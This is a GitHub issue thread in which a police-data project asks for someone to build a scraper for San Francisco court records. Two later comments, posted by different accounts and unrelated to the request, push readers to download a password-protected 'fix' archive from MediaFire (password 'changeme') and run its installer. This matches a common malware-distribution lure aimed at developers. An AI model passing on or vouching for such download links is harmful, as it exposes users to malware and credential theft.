### ISSUE TITLE
SF courts scraper

### ISSUE THREAD

**Issue by josh-chamberlain** [Police-Data-Accessibility-Project/data-projects#79]
Someone has requested help on a data project:

## Submission notes
Looking for a scraper for the San Francisco Courts. More info in GitHub issue here: https://github.com/biglocalnews/court-scraper/issues/179

## Location
San Francisco, CA

## Requirements
See issue linked above

**Comment by josh-chamberlain** [comment]
Requestor was unresponsive. It may not be a bad idea to build one.

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
